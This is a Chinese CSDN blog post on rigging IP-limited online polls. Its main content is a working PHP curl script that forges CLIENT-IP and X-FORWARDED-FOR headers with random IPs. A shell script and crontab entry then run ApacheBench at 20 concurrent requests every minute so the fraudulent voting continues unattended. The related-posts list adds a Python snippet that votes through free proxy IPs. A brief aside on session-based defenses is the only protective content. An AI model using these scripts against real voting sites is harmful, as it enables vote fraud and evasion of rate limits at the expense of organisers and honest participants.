关于投票系统刷票方式原理(突破ip限制刷票PHP版)

最新推荐文章于 2021-04-03 09:24:07 发布
最新推荐文章于 2021-04-03 09:24:07 发布
阅读量3.7w 收藏 19
点赞数 8
分类专栏: php 文章标签: 投票系统 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zouhao619/article/details/37031559
版权

先说一点:其实不算是突破ip限制,因为事实上,这个限制是在服务器端的,客户端在牛逼,也突破不了..只是可以一直刷多次票罢了

一个朋友突然发了一个网站,让我帮她投投票..我这人一项比较好说话,就帮她投了.顺便分析了这个网站,发现这个网站的投票系统有ip限制,但是投票是一个ajax请求.那么办法就出来了.

很多投票PC网站都是依靠限制ip,来限制投票人数.那么我用curl伪造IP,那么就可以轻易制造多个IP进行投票.

下面贴上PHP代码:

由于对方是GET AJAX请求,我这里就贴上GET方法,POST方法请自行修改

<?php
/**
 * @author 邹颢	zouhao619@gmail.com
 */
$ip_long = array(
	array('607649792', '608174079'), //36.56.0.0-36.63.255.255
	array('1038614528', '1039007743'), //61.232.0.0-61.237.255.255
	array('1783627776', '1784676351'), //106.80.0.0-106.95.255.255
	array('2035023872', '2035154943'), //121.76.0.0-121.77.255.255
	array('2078801920', '2079064063'), //123.232.0.0-123.235.255.255
	array('-1950089216', '-1948778497'), //139.196.0.0-139.215.255.255
	array('-1425539072', '-1425014785'), //171.8.0.0-171.15.255.255
	array('-1236271104', '-1235419137'), //182.80.0.0-182.92.255.255
	array('-770113536', '-768606209'), //210.25.0.0-210.47.255.255
	array('-569376768', '-564133889'), //222.16.0.0-222.95.255.255
);
$rand_key = mt_rand(0, 9);
$ip= long2ip(mt_rand($ip_long[$rand_key][0], $ip_long[$rand_key][1]));//随机生成国内某个ip
$url='localhost/ip.php';//这里请填写投票的请求地址
$ch = curl_init($url);
$header = array( 
	"CLIENT-IP:{$ip}", 
	"X-FORWARDED-FOR:{$ip}", 
); 
curl_setopt($ch,CURLOPT_HTTPHEADER,$header);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ; // 获取数据返回
curl_exec($ch);
curl_close($ch);



前部分是随机生成国内的某个ip,然后用curl模拟请求.

由于网站限制是一个ip限制1个小时投30个票,因此,我这里就是随机的.

如果网站是限制1个ip投1个,那么最好把ip修改为顺序生成国内ip,这样可以不重复.

然后我在开启,apache ab,每次并发20个投票..很快票就刷上去了.

那么面对这样的恶意刷票有什么解决办法呢?

我没有什么好的办法防御.但是我这样的curl实际上就是webservice访问,这样的访问是不带session或者cookie的,当然,curl也可以模拟带上cookie,然后在带上phpsessionid从而来带上session.

但是对于一个未知网站而言,并不知道他的处理方式.因此,如果判断是否存在session会有效抵挡一批刷票.但是在提示的时候切勿提示是缺少session这样的文字.最好在给session一个有效时期,这样的安全度会提高(但是如果刷票者知道这样的原理,并不意味能防御住他)

补充一点:很多代码上说能够获取访问者真实的IP地址,这个我没有遇过到正确的能够获取用户真实ip的方法.如果有的话,欢迎留言

如果有什么好的防御方案,希望留言.



有时候如果超时可能会导致脚本中断,最好在配合一个crond来每分钟都执行一下脚本

脚本代码为:

#!/bin/sh
pid=`ps -ef |grep localhost/vote.php |grep vote.php | awk '{print $2}'`;
if [[ $pid == "" ]];then
	echo "vote is start";
	nohup /usr/bin/ab -n 100000 -c 20 http://localhost/vote.php
else
	echo "vote.php is running";
fi

这个脚本就是每分钟判断这个进程存在不,存在的话,就不管,不存在的话,就启动这个进程..

另外可以不用使用nohup来后台执行

在开启crond每分钟跑起来

crontab -e

编辑crond任务 

* * * * * /www/web/default/Controller/Script/vote.sh


前5个*号就是代表每个分钟都执行这个脚本..如果不详,请查阅cron资料

在开启cron

service crond start

大工告成,安心让他自动刷吧.你可以去忙别的事了


Windows系统请自行计划任务,我这里就不帖代码了

我最猪头
关注
  • 8
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
html5微信或移动端给用户投票(效果不错!!)
05-31
微信或移动端给用户投票, 支持微信、app、浏览器等,效果不错
使用免费ip代理进行投票
09-09 385
只要是投票系统,必然要限制一个用户投多张票。 如何限制呢?限制ip是最直观最简单的思路,可是代理池可以解决限制ip情况。 如果投票页面前面加上一个验证码,那程序就会有点困难了。 有些投票使用微信号,一个微信号只允许投一张票。这个其实是非常安全的。因为微信号的获取比ip的获取麻烦多了。人们可以很容易地制造出ip池,却难以构造一个微信号池。 于是,如何限制用户就很简单了:什么东西是一人一份...
关于投票ip限制的一种手段
IT部落阁
09-28 6048
项目中有这样的一个功能,截图如下: 1、不用多说大家都应该明白这是一个什么样的功能,其实就是一个投票。 2、要求是要限制用户的ip一个用户只能投一次。 3、用户第一次投票提示投票成功并且所支持方的票数要累计一,再次投票提示用户您已经投过了。 4、页面在加载完以后如果用户投过票,所支持方是active状态,反对方是gray状态。 经过分析,要获取用户的两个数据:ip和他支持方的标记,
PHP刷票
快乐de馒头
07-02 768
基于 PHP,下面介绍防刷票的一些技巧: 1、HTTP_REFERER : 校验 $_SERVER['HTTP_REFERER']。可伪造,使用 CURL。 curl_setopt($ch, CURLOPT_REFERER, 'HTTP://www.baidu.com');(攻击手段) 2、IP限制:加上 IP 投票限制。可伪造,使用 CURL。 $ip = ***.***.***.***; $h...
一贝图片投票系统 v6.6 超强防作弊.rar
07-04
独创的防刷票机制,接受各刷票高手刷票1.采用了国内首创的随机投票地址,随机加密的URL参数,有效杜绝机器刷票2.每个投票的加密ID只使用一次,有效防止机器刷票3.超强的share object身份验证机制(比COOKIES强百倍),严防刷票4.图片验证码/语音验证码,防止机器刷票的利器5.图片投票系统,可用于人物、风景、楼市、产品的投票评选等。 6.可以发布多张图片,上传选手的视频,声音等多媒体文件7.选手自主报名,自主维护自己的参选信息,后台可设定是否审核机制8.指定投票时间段,限定投票的起始时间,Ajax机制,提升投票用户的感受9.实时显示投票人数,实时更新排行榜,生成排行榜的统计图10.多方位的防刷票功能,可灵活设定同一IP投票的时间间隔,注册的时间限制等11.设定是否启用匿名投票或者需注册投票12.后台广告、赞助商、冠名权等管理,可对投票用户进行随机抽奖13.功能强大的后台系统,公告和活动规则的更新和发布14.多功能的手机短信接口,支持手机投票和反馈信息
IP工具、刷IP软件的原理和工作过程
weixin_34199335的博客
10-09 5071
软件功能:刷流量统计,刷网站流量IP,刷博客,刷投票,刷排行榜,刷流量交换,刷贴子人气等等,只要你想得到的都能用他来刷软件提供了两种刷的方式 ●每种方式都提供刷完后自动关机,等自动化功能,无需人工参于非常方便 ●每种方式IP来源可以是代理IP,也可以用ADSL拨号,任你自己选择 ●软件自带搜索代理IP功能,而且搜索任务可以由用户随意定制 ●自带批量代理I...
什么是IIS?如何用IIS建立本地服务器。
ycjunhua的专栏
03-07 730
什么是IIS 首先,Internet Information Server的缩写为(IIS)是一个World Wide Web server。Gopher server和FTP server全部包容在里面。 IIS意味着你能发布网页,并且有ASP(Active Server Pages)、JAVA、VBscript产生页面,有着一些扩展功能。IIS支持一些有趣的东西,象有编辑环境的界面(FRO...
php投票防刷,php防止恶意刷新与刷票方法
weixin_42133861的博客
04-03 408
php防止恶意刷新与刷票方法发布于 2014-11-30 12:33:26 | 230 次阅读 | 评论: 0 | 来源: 网友投递PHP开源脚本语言PHP(外文名: Hypertext Preprocessor,中文名:“超文本预处理器”)是一种通用开源脚本语言。语法吸收了C语言、Java和Perl的特点,入门门槛较低,易于学习,使用广泛,主要适用于Web开发领域。PHP的文件后缀名为php。...
欣悦在线投票管理系统V4.5(PHP+MySQL)
07-21
可用于图片、人物、风景、楼市、产品的投票评选等。选手可自主报名,可维护自己的参选信息,上传视频,声音等多媒体文件。实时显示投票人数,更新排行榜,生成排行榜的统计图,可灵活设定同一IP投票的时间间隔,限定IP地址段,限定投票地区。支持分类显示与手机投票。
投票器的原理及设计思路
12-03
投票器的原理及设计思路投票器的原理及设计思路投票器的原理及设计思路投票器的原理及设计思路 绝对物有所值
PHP投票程序、防超时,防IP限制
09-01
PHP投票小程序,防超时,防IP限制,描述不多说自己试,也可根据自己需求进行改进。
刷票了解获得客户端IP方法
12-19
前两个星期帮一个朋友的亲戚的孩子刷票,谁让咱们是程序员呢。这当中也遇到过重装系统,除灰尘,淘宝购物,盗QQ,下电影,某一个软件为什么不能使用等等,要是说不会,他们就说你电脑技术不是挺牛逼的吗,这点问题都解决不了。 刷票,分为多种限制,注册用户,验证码,以及IP限制。这个刷票网站,而不,是这个投票网站,限制IP。如果要突破限制,我们需要了解如何获得用户的IP。 getenv('HTTP_X_FORWARDED_FOR') getenv('HTTP_CLIENT_IP') getenv('REMOTE_ADDR') HTTP_X_FORWARDED_FOR 这个是从http header头部
投票软件的基本原理
12-19
自己想的一些点子,做出的一个投票的软件,如果能与数据库联合在一起就非常的完美了,代码非常的少,共110行,代码简单,思路不错。。嘿嘿 自恋了。。。
解析HTTP模拟投票源码
09-13
模拟HTTP链接,解析http协议内容,通过自定义IP和调用代理IP,实现投票功能,仅供学习研究
投票系统源代码,防止刷票
12-17
项目界面:https://blog.csdn.net/qq_43299503/article/details/103589559 项目介绍: (1)制作一个投票系统,让学生给自己喜爱的老师投票。该系统由投票界面组成,系统运行,投票界面出现,标题为“欢迎给老师投票”;在界面上有一个表格,显示了各位老师的编号、姓名、得票数;其中,得票数显示为一个红色的进度条,并显示得票的数值;表格的第四列是投票链接,单击链接,该教师的票数加1,并显示在界面上。 (2)实现上述功能后,可考虑进一步改进。如对数据库的封装以及重用代码等; (3)进一步思考,考虑系统是否存在刷票的隐患,如何防止刷票
嵩嵩评选投票系统2017源代码
03-18
嵩嵩评选投票系统2017是一个以asp+access进行开发的asp投票系统源码。 系统主要功能特点: 1.支持3种不同的显示风格 2.可设置是否能按天重新投票 3.可设置精确的投票开始时间与结束时间 4.可设置投票总数量上限 5....
thinkphp微信投票系统
09-14
微信公众平台投票系统功能: 全程界面后台自定义程度同类型最高,完全没有任何限制 微信投票源码提供多套投票主题风格可供选择 防刷票功能,后台开启验证码,可微信对话框输入id投票。 微信投票管理系统源码可以...
python微信刷票代码
最新发布
12-27
根据提供的引用内容,以下是一个使用Python进行微信刷票的示例代码: ```python import requests import re def get_proxy_ips(): url = "http://api.xicidaili.com/free2016.txt" r = requests.get(url=url) all_url = re.findall("\d+\.\d+\.\d+\.\d+:\d+", r.text) with open("IP.txt", 'w') as f: for i in all_url: f.write(i) f.write(' ') return all_url def vote_with_proxy_ips(vote_url, proxy_ips): for ip in proxy_ips: proxies = { 'http': 'http://' + ip, 'https': 'https://' + ip } try: response = requests.get(vote_url, proxies=proxies) if response.status_code == 200: print("投票成功!") else: print("投票失败!") except: print("代理IP不可用!") # 使用示例 vote_url = "http://example.com/vote" proxy_ips = get_proxy_ips() vote_with_proxy_ips(vote_url, proxy_ips) ``` 这段代码首先通过请求获取代理IP地址,然后使用这些代理IP地址进行投票。每个代理IP地址都会尝试进行投票,如果投票成功则输出"投票成功!",否则输出"投票失败!"。如果代理IP不可用,则输出"代理IP不可用!"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值